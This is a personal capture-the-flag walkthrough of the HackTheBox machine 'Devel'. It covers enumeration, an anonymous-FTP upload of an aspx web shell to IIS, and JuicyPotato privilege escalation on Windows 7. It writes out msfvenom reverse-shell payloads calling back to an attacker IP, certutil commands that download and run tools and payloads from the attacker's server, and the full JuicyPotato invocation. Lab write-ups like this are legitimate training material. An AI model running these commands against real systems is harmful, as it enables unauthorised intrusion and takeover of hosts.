Devel
Personal Rating: Medium
Enumeration
sudo nmap -sV -sC <IP>
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7It looks like I can access the directory of the IIS webserver via ftp.
If I can write files here I can place an aspx webshell
As seen here, this works.
Shell Access
Generating a web shell payload:
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f aspx > shell.aspx
I received a connection, but it dies when I give a command and shows no output
I placed antak.aspx on the host with the same ftp put method. This worked, so I will create a shell from here.
Internal Enumeration
PS> whoami
iis apppool\web
Got the user babis.
I ran systeminfo on the host and placed the output in a file. I then ran wesng over it to check for vulnerabilities. The system is an unpatched Windows 7 as it seems, so there should be plenty.
Perfect, this worked: certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASx86.exe C:\Users\Public\winpeasx86.exe
Lets see if this works: cmd /c C:\Users\Public\winpeasx86.exe > C:\Users\Public\peasout.txt
I could get a proper reverse shell by creating this payload and uploading it with certutil:
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
The user has extensive privileges enabled that would allow for privesc regardless of vulnerabilities:
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledIt seems like I cannot really use winpeas as I do not get any output.
Privilege Escalation
Doing more research on the output of this:
python3 wes.py /HTBfolder/Boxes/HTB-Devel/systeminfo.txt -s critical > /HTBfolder/Boxes/HTB-Devel/wes-output.txt
This did not work http://www.exploit-db.com/exploits/15609/
Trying this: CVE-2010-0232, I found this resource:
I found the exploit with searchsploit and it looks promising:
searchsploit kitrap
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015) | windows/local/11199.txtShellcodes: No Results
searchsploit -p 11199
Exploit: Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)URL: https://www.exploit-db.com/exploits/11199
Path: /usr/share/exploitdb/exploits/windows/local/11199.txt
Codes: CVE-2010-0232, OSVDB-61854, MS10-015
Verified: True
File Type: assembler source, ASCII text
kate /usr/share/exploitdb/exploits/windows/local/11199.txtActually, screw this, I want to try JuicyPotato again as it is basic and common. We need an x86 version of it in this case.
Generating a new shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe > privshell-x86.exe
Getting the exploit:
Transferring the exploit:
certutil.exe -urlcache -f http://10.10.16.6:8000/Juicy.Potato.x86.exe juicypotato.exe
Transferring the shell:
certutil.exe -urlcache -f http://10.10.16.6:8000/privshell-x86.exe privshell.exe
Exploitation:
juicypotato.exe -p C:\Users\Public\privshell.exe -l 1337 -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
With a netcat listener open on my host, this worked!
If it would not have worked, I would have tried some other CLIDs, there are lists online and tools to list them on the device.
Last updated